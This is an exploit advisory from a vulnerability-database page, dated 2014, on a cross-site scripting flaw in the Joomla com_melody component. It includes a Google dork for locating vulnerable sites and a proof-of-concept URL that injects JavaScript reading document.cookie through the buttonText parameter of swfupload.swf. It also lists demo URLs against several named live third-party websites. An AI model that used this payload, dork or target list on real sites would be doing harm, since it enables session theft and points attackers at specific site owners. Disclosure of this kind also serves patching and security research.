Joomla Melody Cross Site Scripting

2014.01.10
Credit: TUNISIAN CYBER
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79
Dork: :inurl:\"components/com_melody/\"

[+] Author: TUNISIAN CYBER [+] Exploit Title: Joomla Component com_melody XSS Vulnerability [+] Date: 09-01-2014 [+] Category: WebApp [+] Google Dork: :inurl:"components/com_melody/" [+] Tested on: KaliLinux [+} Friend's blog: www.na3il.com ######################################################################################## +Exploit: The Joomla melody component suffers from an xss vulnerability. +P.O.C: 127.0.0.1/[PATH]/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(document.cookie)'>XSS</a> Demo: http://www.lachost.net/choir/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E http://nettlys.no/components/com_melody/assets/swfupload/swfupload.swf?buttonText=%3Ca%20href=%27javascript:alert%28document.cookie%29%27%3EXSS%3C/a%3E godsstream.com/~domain20/components/com_melody/assets/swfupload/swfupload.swf?buttonText=<a href='javascript:alert(1)'>XSS</a> ./3nD ######################################################################################## Greets to: XMaX-tn, N43il HacK3r, XtechSEt Sec4Ever Members: DamaneDz UzunDz GEOIX ########################################################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top